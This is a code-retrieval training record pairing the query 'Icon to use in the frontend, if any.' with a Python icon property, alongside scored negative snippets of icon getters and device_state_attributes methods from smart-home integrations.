[ "0.87892145", "0.86683935", "0.86683935", "0.86683935", "0.83668846", "0.8228278", "0.80222344", "0.7944196", "0.7889458", "0.7790521", "0.7790521", "0.76525116", "0.7474403", "0.7448818", "0.74451506", "0.74371916", "0.73949003", "0.7393098", "0.7387312", "0.7380527", "0.736547", "0.73636496", "0.73410094", "0.7295203", "0.7290382", "0.7276533", "0.7271355", "0.7263637", "0.7256454", "0.7256454", "0.7256454", "0.7256454", "0.7256454", "0.72510976", "0.7225737", "0.72050744", "0.7162016", "0.713821", "0.71146786", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.7107337", "0.710641", "0.7101826", "0.7092354", "0.7079597", "0.70716465", "0.70672154", "0.7059588", "0.7039396", "0.7039396", "0.7034777", "0.7030613", "0.7023489", "0.69935334", "0.69889545", "0.6985798", "0.6981768", "0.6979921", "0.696316", "0.6933011", "0.6913705", "0.69077885", "0.69042885", "0.6903379", "0.68983275", "0.6885932", "0.68503225", "0.6837218", "0.6824637", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.68128216", "0.6796391", "0.67944694", "0.6785044", "0.6782405", "0.6782345", "0.678094", "0.67789614", "0.6776438" ]
0.0
-1
Icon to use in the frontend, if any.
def icon(self): return self._icon
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return None", "def icon(self):\n return None", "def icon(self):", "def icon(self):\n return DEFAULT_ICON", "def icon(self):\n return self.ICON", "def icon(self):\n return self.ICON", "def get_icon(self):\n raise NotImplementedError", "def get_icon(self):\r\n raise NotImplementedError", "def icon(self) -> str:\n return ICON_SERVER", "def icon(self):\n return ICON_BUS", "def get_icon(self):\n return self.ICON", "def get_icon(self):\n\t\treturn QIcon()", "def icon(self):\n if \"icon\" in self._typeconf:\n return self._typeconf[\"icon\"]", "def get_icon(self):\r\n return get_icon(self.ICON)", "def icon(self):\n return self.__icon", "def icon(self):\r\n try:\r\n return self.data['icon_url_base']+self.data['icon_url_name']\r\n except KeyError:\r\n return ''", "def icon(self):\n return \"mdi:hubspot\"", "def icon(self) -> str:\n return self._icon", "def icon(self) -> str:\n return self._icon", "def icon(self) -> str:\n return self._icon", "def icon(self):\r\n return self._icon", "def icon(self):\r\n icon_path = \":/plugins/pdok_services/icon.png\"\r\n icon = QtGui.QIcon(icon_path)\r\n return icon", "def icon(self) -> str | None:\n return self._icon", "def get_icon(self):\n return self._icon", "def getIcon(self):\n return \":/icons/Ship_Instance.svg\"", "def icon(self):\n return self._sensor[CONF_ICON]", "def icon(self):\n return self._config.get(CONF_ICON)", "def icon(self) -> str:\n return ICON_CORAL", "def icon(self) -> str:\n return ICON_CORAL", "def icon(self) -> typing.Union[str, None]:\n return self._icon", "def icon(self):\n return \"mdi:car\"", "def icon(self):\n if not self.device_class:\n return ICONS.get(self.entity_type)\n return None", "async def icon(self, ctx: lifesaver.Context):\n if not ctx.guild.icon:\n await ctx.send(\"This server doesn't have a custom icon.\")\n return\n\n await ctx.send(ctx.guild.icon.replace(format=\"png\"))", "def icon(self):\n if self.zone_variable == \"temperature\":\n return \"mdi:thermometer\"\n if self.zone_variable == \"humidity\":\n return \"mdi:water-percent\"", "def icon(self):\n return self.var_icon", "def icon(self) -> str | None:\n if isinstance(self.wemo, CoffeeMaker):\n return \"mdi:coffee\"\n return None", "def icon(self) -> Icon:\n return self._icon", "def icon(self):\n return self.sensor_type[\"icon\"]", "def get_icon(self):\n\n return self._icon", "def _icons(self):", "def icon(self):\n return self._sensor_type.icon", "def icon(self):\n return self._var_icon", "def icon(self):\n return self._var_icon", "def icon(self):\n return self._metadata[2]", "def get_icon_class(self):\r\n return self.icon_class", "def icon(self) -> str:\n return \"mdi:thermometer\"", "def icon(self):\n return 'mdi:broom'", "def get_icon(self):\n try:\n icon = self.icon.fa_icon\n except AttributeError:\n icon = 'fa-globe'\n\n return icon", "def getIconPath(self):\n try:\n return self.primaryAq().zIcon\n except AttributeError:\n return '/zport/dmd/img/icons/noicon.png'", "def icon(self) -> str | None:\n value = self.entity_description.icon\n if self.entity_description.key == \"weather\":\n value = self.state\n if value is None:\n value = \"sunny\"\n elif value == \"partlycloudy\":\n value = \"partly-cloudy\"\n value = 
f\"mdi:weather-{value}\"\n\n return value", "def icon(self):\n if self.device_class:\n return None\n\n return ICONS.get(self.tesla_device.type)", "def show_os_icon(self):\n if self.os == 0:\n return \"<i class='devicon-debian-plain'></i>\"\n elif self.os == 1:\n return \"<i class='devicon-redhat-plain'></i>\"\n else:\n return \"?\"", "def icon(self):\n return STATUSES.get(self._mower_status, {}).get('icon', DEFAULT_ICON)", "def getIconPath(self):\n return '/zport/dmd/img/icons/noicon.png'", "def icon(self, value: str | None) -> None:\n self._icon = value", "def icon(self):\n if self._sensor_type == DEVICE_TYPE_DOORBELL:\n if self._camera_data[\"event_ring_on\"]:\n return \"mdi:bell-ring-outline\"\n return \"mdi:doorbell-video\"", "def icon(self, icon):\n self._icon = icon", "def toolIcon(self):\n if self.tmFile is not None:\n iconFile = pFile.conformPath(os.path.join(os.path.dirname(self.tmFile), '__ico__.png'))\n if os.path.exists(iconFile):\n return iconFile", "def icon(self) -> str | None:\n return self._get_sensor_type()[1]", "def get_icon():\n icon = Path(__file__).parent.joinpath(\"resources\", \"icon.png\")\n # We just want the string to the path for PySide.\n return str(icon)", "def icon(self):\n ret_icon = self._icon\n if self.player_name == \"lower\":\n ret_icon = self._icon.lower()\n if self.is_promoted:\n ret_icon = \"+\" + ret_icon\n return ret_icon", "def getIcon():\n\treturn \"Animator.png\"", "def icon(self):\n return \"mdi:currency-gbp\"", "def icon(self):\n if self._sensor_type == \"battery_level\" and self._state is not None:\n return icon_for_battery_level(\n battery_level=int(self._state), charging=False\n )\n return self._icon", "def icon(self):\n icons = self._icons.split(\",\")\n return (\n f\"mdi:{icons[0]}\" if self.state != TYPE_RECORD_NEVER else f\"mdi:{icons[1]}\"\n )", "def icon(self):\n if self._type == 'birth':\n return 'mdi:calendar-star'\n elif self._type == 'wedding':\n return 'mdi:calendar-heart'\n elif self._type == 'memorial':\n return 'mdi:calendar-clock'\n else:\n return 'mdi:calendar-check'", "def icon(self):\n\n # look for icon one level up from this hook's folder in \"icons\" folder\n return os.path.join(\n self.disk_location,\n os.pardir,\n \"icons\",\n \"review.png\"\n )", "def icon_url(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"icon_url\")", "def get_icon_name(self):\n return 'gramps-notes'", "def om_icons(self):\n icons = ({'path': 'misc_/DataTemplates/ic-xml.gif',\n 'alt': self.meta_type, 'title': self.meta_type},)\n if not self._v_cooked:\n self._cook()\n if self._v_errors:\n icons = icons + ({'path': 'misc_/PageTemplates/exclamation.gif',\n 'alt': 'Error',\n 'title': 'This template has an error'},)\n return icons", "def icon(self):\n return SENSOR_TYPES[self.type][2]" ]
[ "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8134013", "0.8134013", "0.80181646", "0.7946183", "0.79384285", "0.79384285", "0.79349846", "0.7925307", "0.7891739", "0.78858066", "0.7807477", "0.7763528", "0.772793", "0.7699367", "0.7653089", "0.7557824", "0.75493824", "0.750676", "0.750676", "0.750676", "0.7485068", "0.74771065", "0.74713224", "0.7458794", "0.7409361", "0.73843366", "0.7369637", "0.7343618", "0.7343618", "0.73394156", "0.7282764", "0.7277016", "0.72681504", "0.72499543", "0.7224799", "0.72145945", "0.7207319", "0.72068244", "0.7200781", "0.7190791", "0.71740735", "0.7163048", "0.7163048", "0.71617895", "0.7154149", "0.71123415", "0.70922625", "0.70890933", "0.7081491", "0.7074217", "0.7071028", "0.7051232", "0.7027755", "0.7025085", "0.7006342", "0.7004105", "0.69972306", "0.69961834", "0.6987644", "0.6985583", "0.6942356", "0.6940673", "0.69370043", "0.69283247", "0.6910015", "0.68887156", "0.68828356", "0.6874635", "0.6866664", "0.6848983", "0.6843187" ]
0.75128
40
Return the device state attributes.
def device_state_attributes(self): attrs = {} attrs[ATTR_ATTRIBUTION] = DEFAULT_ATTRIBUTION attrs[ATTR_BRAND] = DEFAULT_BRAND attrs[ATTR_CAMERA_TYPE] = self._camera_type return attrs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def device_state_attributes(self):\r\n return self.attributes", "def device_state_attributes(self):\r\n return self._attributes", "def device_state_attributes(self):\n return self._attrs", "def device_state_attributes(self):\n return self.attr", "def device_state_attributes(self):\n return self.attr", "def device_state_attributes(self):\n return self._state_attrs", "def device_state_attributes(self):\n return self._state_attrs", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._state_attributes", "def device_state_attributes(self): # Can be remove from 0.99\n return self._attr", "def device_state_attributes(self) -> Dict[str, any]:\n return self._device.state_attributes", "def device_state_attributes(self):\n return self._attribute", "def device_state_attributes(self):\n return self._attribute", "def device_state_attributes(self):\n return self._ba_attrs", "def device_state_attributes(self):\n return self._device.status", "def device_state_attributes(self):\n return self.custom_attributes", "def device_state_attributes(self):\n attrs = {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n ATTR_DEVICE_ID: self.unique_id,\n }\n return attrs", "def device_state_attributes(self):\n attributes = self._attrs\n\n for variable in self._sid_data[\"sid_attr\"]:\n if variable in self._data:\n attributes[format_attribute(variable)] = self._data[variable]\n\n return attributes", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n \"state\": self._unlocked,\n \"available\": self.available,\n \"door_open\": self._door_open,\n \"device_model\": self._device.product_model,\n \"mac\": self.unique_id\n }", "def device_state_attributes(self):\n attrs = {}\n attrs[\"up_since\"] = self._up_since\n attrs[\"last_motion\"] = self._last_motion\n attrs[\"online\"] = self._online\n attrs[\"uuid\"] = self._uuid\n\n return attrs", "def device_state_attributes(self):\n return {\n 'addr': self._device.addr,\n 'ieee': self._device.ieee,\n 'endpoint': '0x{:02x}'.format(self._endpoint),\n }", "def device_state_attributes(self):\n return {ATTR_ATTRIBUTION: ATTRIBUTION}", "def device_state_attributes(self):\n return {ATTR_ATTRIBUTION: ATTRIBUTION}", "def device_state_attributes(self):\n return {\"uuid\": self.uuidAction,\n \"room\": self.room,\n \"category\": self.cat,\n \"device_typ\": self.type,\n \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n res = {}\n res[ATTR_DEPARTURE] = self._departure\n res[ATTR_DURATION] = self._duration\n res[ATTR_DELAY] = self._delay\n res[ATTR_CONNECTIONS] = self._connections\n res[ATTR_DESCRIPTION] = self._description\n res[ATTR_START_TIME] = self._start_time\n res[ATTR_DETAIL] = self._detail\n return res", "def 
device_state_attributes(self):\n\n attr = {\n \"uiclass\": self.tahoma_device.uiclass,\n \"widget\": self.tahoma_device.widget,\n \"type\": self.tahoma_device.type,\n }\n\n if CORE_RSSI_LEVEL_STATE in self.tahoma_device.active_states:\n attr[ATTR_RSSI_LEVEL] = self.tahoma_device.active_states[\n CORE_RSSI_LEVEL_STATE\n ]\n\n # TODO Parse 'lowBattery' for low battery warning. 'dead' for not available.\n # \"dead\", \"lowBattery\", \"maintenanceRequired\", \"noDefect\"\n if CORE_SENSOR_DEFECT_STATE in self.tahoma_device.active_states:\n attr[ATTR_BATTERY_LEVEL] = self.tahoma_device.active_states[\n CORE_SENSOR_DEFECT_STATE\n ]\n\n return attr", "def device_state_attributes(self):\n return {\"uuid\": self.uuidAction, \"room\": self.room,\n \"category\": self.cat,\n \"device_typ\": self.type, \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n attr = {}\n attr['remote_lock'] = self.remote_lock\n attr['power_state'] = self._power_state\n attr['heating_active'] = self._is_heating_active\n attr['auto_override'] = self.auto_override\n attr['sensor_mode'] = self.sensor_mode\n attr['external_sensor_temprange'] = self.external_temp\n attr['deadzone_sensor_temprange'] = self.deadzone_sensor_temprange\n attr['loop_mode'] = self._loop_mode\n attr['roomtemp_offset'] = self.roomtemp_offset\n attr['anti_freeze_function'] = self.anti_freeze_function\n attr['poweron_mem'] = self.poweron_mem\n attr['external_temp'] = self.external_temp\n attr['clock_hour'] = self.clock_hour\n attr['clock_min'] = self.clock_min\n attr['clock_sec'] = self.clock_sec\n attr['day_of_week'] = self.day_of_week\n attr['week_day'] = self.week_day\n attr['week_end'] = self.week_end\n return attr", "def device_state_attributes(self):\n tmp = self._boiler.__dict__.items()\n return {'status': {k: v for k, v in tmp if k in GH_STATE_ATTRS}}", "def device_state_attributes(self):\n attr = {}\n if self._last_updated is not None:\n attr['Last Updated'] = self._last_updated\n return attr", "def device_state_attributes(self):\n return {ATTR_NUMBER: self._index}", "def device_state_attributes(self):\n data = {}\n if self._is_dimmable and self._brightness_pct:\n data = {ATTR_BRIGHTNESS_PCT: self._brightness_pct}\n data.update({#'alarm': self._alarm,\n 'operation_mode': self.operation_mode,\n 'rssi': self._rssi,\n 'occupancy': self._occupancy,\n 'wattage_override': self._wattage_override,\n 'id': self._id})\n return data", "def device_state_attributes(self):\n # attributes = super().device_state_attributes\n _config_attrib = self._product.get_data_config_json()\n return _config_attrib", "def device_state_attributes(self):\n # attributes = super().device_state_attributes\n attributes = {ATTR_UNIT_OF_MEASUREMENT: self._unit}\n return attributes", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: HA_ATTRIBUTION,\n HA_TIMESTAMP: self._timestamp,\n }", "def device_state_attributes(self):\n return {\n \"attribution\": ATTRIBUTION,\n \"id\": str(self.coordinator.data.get(\"id\")),\n \"integration\": DOMAIN,\n }", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n ATTR_LAST_UPDATE: self.metoffice_now.date if self.metoffice_now else None,\n ATTR_SENSOR_ID: self._type,\n ATTR_SITE_ID: self.metoffice_site_id if self.metoffice_site_id else None,\n ATTR_SITE_NAME: self.metoffice_site_name\n if self.metoffice_site_name\n else None,\n }", "def device_state_attributes(self):\n return self._emeter_params", "def device_state_attributes(self) -> str:\n return {\n \"remo_device_id\": self._remo_device.id,\n 
\"remo_device_name\": self._remo_device.name,\n \"remo_firmware_version\": self._remo_device.firmware_version,\n \"remo_temperature_offset\": self._remo_device.temperature_offset,\n \"remo_humidity_offset\": self._remo_device.humidity_offset\n }", "def device_state_attributes(self):\n # Move these to Thermostat Device and make them global\n return {\n \"current_humidity\": self._current_humidity,\n \"status\": self._current_state,\n \"program\": self._current_program,\n \"away_mode\": self._away\n }", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_CAMERA_TYPE: self._device_type,\n }", "def device_state_attributes(self):\n return self._hass.data[DATA_UPCOMING]", "def device_state_attributes(self):\n attr = {}\n\n if self._battery_level is not None:\n attr[ATTR_BATTERY_LEVEL] = self._battery_level\n\n return attr", "def device_state_attributes(self):\n attrs = {\n ATTR_STATE_DEVICE_LOCKED: self._device.device_lock,\n ATTR_STATE_LOCKED: self._device.lock,\n }\n return attrs", "def device_state_attributes(self):\n if self._data is not None:\n return {\n \"阳历\": self._data.yangli,\n \"阴历\": self._data.yinli,\n \"五行\": self._data.wuxing,\n \"冲煞\": self._data.chongsha,\n \"百忌\": self._data.baiji,\n \"吉神\": self._data.jishen,\n \"宜\": self._data.yi,\n \"凶神\": self._data.xiongshen,\n \"忌\": self._data.ji,\n }", "def device_state_attributes(self):\n attrs = {}\n\n attrs[ATTR_ATTRIBUTION] = ATTRIBUTION\n attrs[\"brand\"] = DEFAULT_BRAND\n attrs[ATTR_CAMERA_TYPE] = self._camera_type\n attrs[\"friendly_name\"] = self._name\n\n return attrs", "def device_state_attributes(self):\n if self.ticker is not None:\n return {\n ATTR_VOLUME_24H: self.ticker.values.get(\"volume\"),\n ATTR_ATTRIBUTION: ATTRIBUTION,\n ATTR_HIGH: self.ticker.values.get(\"high\"),\n ATTR_LOW: self.ticker.values.get(\"low\"),\n ATTR_VWAP: self.ticker.values.get(\"vwap\")\n }", "def device_state_attributes(self):\n ret = {\n ATTR_ENTITY_ID: self._entity_id,\n ATTR_COEFFICIENTS: self._coefficients,\n CONF_TRACKED_ENTITY_ID: self._tracked_entity_id,\n ATTR_BASE_SENSOR: self._entity_id.replace(\"_calibrated\", \"\"),\n CONF_MQTT_TOPIC: self._mqtt_topic,\n CONF_DATAPOINTS: self._datapoints,\n }\n if self._attribute:\n ret[ATTR_ATTRIBUTE] = self._attribute\n if self._attributes:\n ret.update(self._attributes)\n return ret", "def device_state_attributes(self):\n node = self.gateway.sensors[self.node_id]\n child = node.children[self.child_id]\n attr = {\n ATTR_BATTERY_LEVEL: node.battery_level,\n ATTR_HEARTBEAT: node.heartbeat,\n ATTR_CHILD_ID: self.child_id,\n ATTR_DESCRIPTION: child.description,\n ATTR_DEVICE: self.gateway.device,\n ATTR_NODE_ID: self.node_id,\n }\n\n set_req = self.gateway.const.SetReq\n\n for value_type, value in self._values.items():\n attr[set_req(value_type).name] = value\n\n return attr", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_CAMERA_TYPE: self._camera_type,\n }", "def device_state_attributes(self):\n return {\"uuid\": self.uuidAction, \"room\": self.room,\n \"category\": self.cat,\n \"selected_scene\": self.effect,\n \"device_typ\": self.type, \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n if self._type == ATTR_CAQI:\n self._attrs[ATTR_CAQI_LEVEL] = self.data[ATTR_CAQI_LEVEL]\n if self._type == ATTR_PM25:\n self._attrs[ATTR_LIMIT] = self.data[ATTR_PM25_LIMIT]\n self._attrs[ATTR_PERCENT] = round(self.data[ATTR_PM25_PERCENT])\n if self._type == ATTR_PM10:\n self._attrs[ATTR_LIMIT] = 
self.data[ATTR_PM10_LIMIT]\n self._attrs[ATTR_PERCENT] = round(self.data[ATTR_PM10_PERCENT])\n return self._attrs", "def device_state_attributes(self):\n attr = {\n 'folder': self._folder_path,\n 'filter': self._filter_term,\n 'recursive': self._recursive,\n 'number_of_files': self._number_of_files,\n 'bytes': self._size,\n 'last_added': self._last_added,\n 'last_deleted': self._last_deleted,\n 'last_modified': self._last_modified\n }\n return attr", "def device_state_attributes(self):\n if self._xfinity_data.total_usage is None:\n return None\n\n res = {ATTR_ATTRIBUTION: ATTRIBUTION}\n res[ATTR_TOTAL_USAGE] = self._xfinity_data.total_usage\n res[ATTR_ALLOWED_USAGE] = self._xfinity_data.allowed_usage\n res[ATTR_REMAINING_USAGE] = self._xfinity_data.remaining_usage\n return res", "def device_state_attributes(self):\n return{\n ATTR_STREET_NUMBER: self._street_number,\n ATTR_STREET: self._street,\n ATTR_CITY: self._city,\n ATTR_POSTAL_TOWN: self._postal_town,\n ATTR_POSTAL_CODE: self._postal_code,\n ATTR_REGION: self._region,\n ATTR_COUNTRY: self._country,\n ATTR_COUNTY: self._county,\n ATTR_ATTRIBUTION: CONF_ATTRIBUTION,\n ATTR_FORMATTED_ADDRESS: self._formatted_address,\n }", "def device_state_attributes(self):\n attr = {\n CONF_TARGETS: self._targets,\n PREDICTIONS: self._predictions\n }\n\n return attr", "def state_attributes(self):\n return self._attributes", "def state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n\n state = {\n \"car\": self._licenseplate,\n \"vin\": self._vin,\n \"retrievalstatus\": self._get_car_value(\n self._feature_name,\n self._object_name,\n \"retrievalstatus\",\n \"error\"\n ),\n }\n if self._extended_attributes is not None:\n for attrib in self._extended_attributes:\n\n retrievalstatus = self._get_car_value(self._feature_name, attrib,\n \"retrievalstatus\", \"error\")\n\n if retrievalstatus == \"VALID\":\n state[attrib] = self._get_car_value(\n self._feature_name, attrib, \"value\", \"error\"\n )\n\n if retrievalstatus == \"NOT_RECEIVED\":\n state[attrib] = \"NOT_RECEIVED\"\n return state", "def device_state_attributes(self):\n attributes = dict(self._state)\n\n # Parse timestamps\n for key in ['lastErrorCodeTimestamp', 'nextStartTimestamp', 'storedTimestamp']:\n if key in attributes:\n if isinstance(attributes[key], int):\n # Sometimes(tm), Husqvarna will return a timestamp in millis :(\n if attributes[key] > 999999999999:\n attributes[key] /= 1000.0\n attributes[key] = datetime.utcfromtimestamp(attributes[key])\n\n # Ignore some unneeded attributes & format error messages\n ignored_attributes = list(IGNORED_API_STATE_ATTRIBUTES)\n if attributes['lastErrorCode'] > 0:\n attributes['lastErrorMessage'] = ERROR_MESSAGES.get(attributes['lastErrorCode'])\n else:\n ignored_attributes.extend(['lastErrorCode', 'lastErrorCodeTimestamp', 'lastErrorMessage'])\n if attributes['nextStartSource'] == 'NO_SOURCE':\n ignored_attributes.append('nextStartTimestamp')\n\n return sorted({ k: v for k, v in attributes.items() if not k in ignored_attributes }.items())", "def state_attributes(self):\n return {\"uuid\": self.uuidAction, \"room\": self.room,\n \"category\": self.cat,\n \"device_typ\": self.type, \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n return {\n ATTR_BATTERY_LEVEL:\n self.device.device_data[self.device_id]['battery_level']\n }", "def device_state_attributes(self):\n if self.airly.data_available:\n if self.type == ATTR_CAQI_DESCRIPTION:\n self._attrs[ATTR_CAQI_ADVICE] = (self.airly.data\n 
[ATTR_CAQI_ADVICE])\n if self.type == ATTR_CAQI:\n self._attrs[ATTR_CAQI_LEVEL] = self.airly.data[ATTR_CAQI_LEVEL]\n if self.type == ATTR_PM25:\n self._attrs[ATTR_LIMIT] = self.airly.data[ATTR_PM25_LIMIT]\n self._attrs[ATTR_PERCENT] = (round(self.airly.data\n [ATTR_PM25_PERCENT]))\n if self.type == ATTR_PM10:\n self._attrs[ATTR_LIMIT] = self.airly.data[ATTR_PM10_LIMIT]\n self._attrs[ATTR_PERCENT] = (round(self.airly.data\n [ATTR_PM10_PERCENT]))\n return self._attrs", "def extra_state_attributes(self) -> dict[str, bool | int]:\n attr = {}\n\n if self._device.offset is not None:\n attr[ATTR_OFFSET] = self._device.offset\n\n if self._device.valve is not None:\n attr[ATTR_VALVE] = self._device.valve\n\n if self._device.locked is not None:\n attr[ATTR_LOCKED] = self._device.locked\n\n return attr", "def device_state_attributes(self):\n while len(self._device.prices) < 4:\n self._device.prices.append(\"None\")\n attrs = {\n \"device_name\": self._device.name,\n \"description\": self.description,\n \"unit_of_measurement\": self._device.price_currency,\n \"product_id\": self.product_id,\n \"price1\": self._device.prices[0],\n \"price2\": self._device.prices[1],\n \"price3\": self._device.prices[2],\n \"price4\": self._device.prices[3],\n }\n return attrs", "def state_attributes(self):\n return self._vehicle.data", "def device_state_attributes(self):\n attr = {}\n attr[\"enabled\"] = self._controller.enabled\n attr[\"zone_count\"] = len(self._controller._zones)\n attr[\"zones\"] = \"\"\n current = self._controller.runs.current_run\n if current is not None:\n attr[\"current_zone\"] = current.index + 1\n attr[\"current_name\"] = current.zone.name\n attr[\"current_start\"] = dt.as_local(current.start_time)\n attr[\"current_duration\"] = str(current.duration)\n attr[\"time_remaining\"] = str(current.time_remaining)\n attr[\"percent_complete\"] = current.percent_complete\n else:\n attr[\"current_schedule\"] = RES_NOT_RUNNING\n attr[\"percent_complete\"] = 0\n\n next = self._controller.runs.next_run\n if next is not None:\n attr[\"next_zone\"] = next.index + 1\n attr[\"next_name\"] = next.zone.name\n attr[\"next_start\"] = dt.as_local(next.start_time)\n attr[\"next_duration\"] = str(next.duration)\n else:\n attr[\"next_schedule\"] = RES_NONE\n\n return attr", "def device_state_attributes(self):\n # TODO: convert RH from Elk to AH ?\n #if self.current_humidity > 0:\n # humidity = self.current_humidity\n data = {\n 'hidden': self._hidden,\n 'temp_unit' : self.temperature_unit,\n }\n if self._device.temp_outside is not None and self._device.temp_outside > -460:\n data['temp_outside'] = self._device.temp_outside\n if self._device.temp_3 is not None and self._device.temp_3 > -460:\n data['temp_3'] = self._device.temp_3\n if self._device.temp_4 is not None and self._device.temp_4 > -460:\n data['temp_4'] = self._device.temp_4\n return data", "def device_state_attributes(self):\n return {\n \"load_shedding_active\": self.coordinator.data.get(\"load_shedding_active\"),\n }", "def state_attributes(self):\n return self._wan", "def extra_state_attributes(self):\n\n attrs = {\n \"device_id\": self._device_id,\n \"is_smart_program\": self._program.get(\"is_smart_program\", False),\n \"frequency\": self._program.get(\"frequency\"),\n \"start_times\": self._program.get(\"start_times\"),\n \"budget\": self._program.get(\"budget\"),\n \"program\": self._program.get(\"program\"),\n \"run_times\": self._program.get(\"run_times\"),\n }\n\n return attrs", "def state_attributes(self):\n\n data = {\n \"devices\": {\n \"AC1\": 
{\n \"participate\": True,\n \"reset\": False,\n \"zone_min\": 0,\n \"zone_max\": 1,\n \"flexibility\": \"high\"\n },\n \"AC2\": {\n \"participate\": True,\n \"reset\": False,\n \"zone_min\": 0,\n \"zone_max\": 1,\n \"flexibility\": \"low\"\n },\n \"WH1\": {\n \"participate\": True,\n \"reset\": False,\n \"zone_min\": 0,\n \"zone_max\": 1,\n \"flexibility\": \"low\"\n }\n }\n }\n\n return data", "def state_attributes(self):\n attrs = {\"access_token\": self.access_tokens[-1]}\n\n if self.model:\n attrs[\"model_name\"] = self.model\n\n if self.brand:\n attrs[\"brand\"] = self.brand\n\n if self.motion_detection_enabled:\n attrs[\"motion_detection\"] = self.motion_detection_enabled\n\n if self.supports_doorbell_chime:\n attrs[\"doorbell_chime\"] = self.supports_doorbell_chime\n\n return attrs", "def extra_state_attributes(self):\n attr = {}\n #attr[\"name\"] = self._visonic_device.getDeviceName()\n attr[PANEL_ATTRIBUTE_NAME] = self._panel\n attr[DEVICE_ATTRIBUTE_NAME] = self._visonic_device.getDeviceID()\n return attr", "def device_state_attributes(self):\n attributes = {\n ATTR_DEVICE_TYPE: self._device_type,\n ATTR_ATTRIBUTION: ATTRIBUTION\n }\n\n if not self._coordinator.data:\n return attributes\n\n # reformat date/time\n try:\n str_start = self._coordinator.data['start']\n str_end = self._coordinator.data['end']\n dt_start = datetime.strptime(str_start, INPUT_DATETIME_FORMAT)\n dt_end = datetime.strptime(str_end, INPUT_DATETIME_FORMAT)\n attributes[ATTR_START_DATETIME] = datetime.strftime(dt_start, ATTR_DATETIME_FORMAT)\n attributes[ATTR_END_DATETIME] = datetime.strftime(dt_end, ATTR_DATETIME_FORMAT)\n except:\n _LOGGER.warning(\"Failed to reformat datetime object\")\n\n return attributes", "def state_attributes(self):\n return {\n ATTR_WEATHER_ATTRIBUTION: ATTRIBUTION,\n ATTR_STATION: self.probe.get_data('station_name'),\n ATTR_UPDATED: '{} {}'.format(self.probe.get_data('update_date'),\n self.probe.get_data('update_time')),\n }", "def device_state_attributes(self):\n if self._sensor_type == DEVICE_TYPE_DOORBELL:\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_LAST_TRIP_TIME: self._camera_data[\"last_ring\"],\n }\n if (\n self._camera_data[\"event_object\"] is not None\n and len(self._camera_data[\"event_object\"]) > 0\n ):\n detected_object = self._camera_data[\"event_object\"][0]\n _LOGGER.debug(\n f\"OBJECTS: {self._camera_data['event_object']} on {self._name}\"\n )\n else:\n detected_object = \"None Identified\"\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_LAST_TRIP_TIME: self._camera_data[\"last_motion\"],\n ATTR_EVENT_SCORE: self._camera_data[\"event_score\"],\n ATTR_EVENT_LENGTH: self._camera_data[\"event_length\"],\n ATTR_EVENT_OBJECT: detected_object,\n }", "def device_state_attributes(self) -> dict:\n return {\n \"auto_comfort\": self._device.fan_autocomfort.capitalize(),\n \"smartmode\": self._device.fan_smartmode.capitalize(),\n **super().device_state_attributes,\n }", "def device_state_attributes(self):\n return {\n \"next_load_shedding_slot\": self.coordinator.data.get(\"next_load_shedding_slot\"),\n }", "def device_state_attributes(self):\n attrs = {}\n\n for poc in self._pockets:\n id = poc[CONF_POCKET_ID]\n name = poc[CONF_POCKET_NAME]\n\n attrs[id] = name\n\n return attrs", "def state_information(self) -> Dict[str, Any]:\n raise NotImplementedError(\"Device subclass needs to implement this.\")", "def device_state_attributes(self):\n attr = {}\n attr[\"enabled\"] = self._zone.enabled and self._controller.enabled\n attr[\"status\"] = 
